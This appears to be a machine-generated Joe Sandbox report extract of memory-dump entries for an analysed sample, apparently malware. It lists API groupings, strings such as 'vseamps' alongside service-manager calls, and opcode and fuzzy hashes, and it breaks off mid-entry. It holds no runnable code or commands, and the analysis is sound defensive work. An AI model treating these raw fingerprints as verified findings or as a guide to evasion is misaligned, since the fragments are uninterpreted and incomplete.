                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$Load$Library
                                                      • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                      • API String ID: 3981747205-232180764
                                                      • Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                                      • Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
                                                      • Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                                      • Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
                                                      • String ID:
                                                      • API String ID: 4284112124-0
                                                      • Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                                      • Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
                                                      • Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                                      • Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
                                                      • String ID: vseamps
                                                      • API String ID: 3693165506-3944098904
                                                      • Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                                      • Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
                                                      • Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                                      • Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00
                                                      APIs
                                                      • GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: FileModuleName
                                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                      • API String ID: 514040917-4022980321
                                                      • Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                                      • Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
                                                      • Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                                      • Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
                                                      • String ID:
                                                      • API String ID: 2057259594-0
                                                      • Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                                      • Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
                                                      • Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                                      • Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$Free$AllocInfoStartupVersion
                                                      • String ID:
                                                      • API String ID: 3103264659-0
                                                      • Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                                      • Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
                                                      • Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                                      • Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                      • String ID:
                                                      • API String ID: 3140674995-0
                                                      • Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                                      • Instruction ID: 4ea9704f24f0ba0f1ec70a2fe03f6a5af2a6423d9a24afefb05b9b45bffa4e10
                                                      • Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                                      • Instruction Fuzzy Hash: F4314572A09B818AEB608F60EC407ED7765FB98784F444139DA6E47BD8DF78D648CB10
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                                      • String ID:
                                                      • API String ID: 1269745586-0
                                                      • Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                                      • Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
                                                      • Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                                      • Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                      • String ID:
                                                      • API String ID: 1239891234-0
                                                      • Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                                      • Instruction ID: 653ea2b8929e13f606da4b0a60c013e651665f19cb571d19e27d0229b41b9c8f
                                                      • Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                                      • Instruction Fuzzy Hash: 05316032A19B818ADB60CF25EC412AE77A0FB98794F540635EAAD43BD9DF7CD145CB00
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                      • String ID:
                                                      • API String ID: 1445889803-0
                                                      • Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                                      • Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
                                                      • Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                                      • Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
                                                      • HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcess
                                                      • String ID:
                                                      • API String ID: 1617791916-0
                                                      • Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                                      • Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
                                                      • Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                                      • Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$CaptureContext
                                                      • String ID:
                                                      • API String ID: 2202868296-0
                                                      • Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                                      • Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
                                                      • Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                                      • Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: ExceptionRaise_clrfp
                                                      • String ID:
                                                      • API String ID: 15204871-0
                                                      • Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                                      • Instruction ID: e7e6f9ce2bdcea37b763abec4cfb23d13ff88d12543ca714b4ff7687d8dcc407
                                                      • Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                                      • Instruction Fuzzy Hash: C6B13D73604B898FEB15CF29C84636C7BA0F758B88F158A26DB6D877A4CB39D455CB00
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: ByteCharErrorLastMultiWide
                                                      • String ID:
                                                      • API String ID: 203985260-0
                                                      • Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                                      • Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
                                                      • Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                                      • Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                                      • Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
                                                      • Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                                      • Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                                      • Instruction ID: e7e405b37517b74b71446d5d28c6a6859f4e6be5f9c8cba57215f80db46f5754
                                                      • Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                                      • Instruction Fuzzy Hash: DF51C622B0D6819AFB209BB2AC445AE7BA5AB597D4F144235EE7C27AD6DF3CD401C700
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: EntryFunctionLookup
                                                      • String ID:
                                                      • API String ID: 3852435196-0
                                                      • Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                                      • Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
                                                      • Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                                      • Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                                      • Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
                                                      • Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                                      • Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID:
                                                      • API String ID: 2299586839-0
                                                      • Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                                      • Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
                                                      • Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                                      • Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                       • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -
                                                      • API String ID: 0-2547889144
                                                      • Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                                      • Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
                                                      • Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                                      • Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                       • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -
                                                      • API String ID: 0-2547889144
                                                      • Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                                      • Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
                                                      • Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                                      • Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                       • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                                      • Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
                                                      • Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                                      • Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700
                                                      Strings
                                                      Memory Dump Source
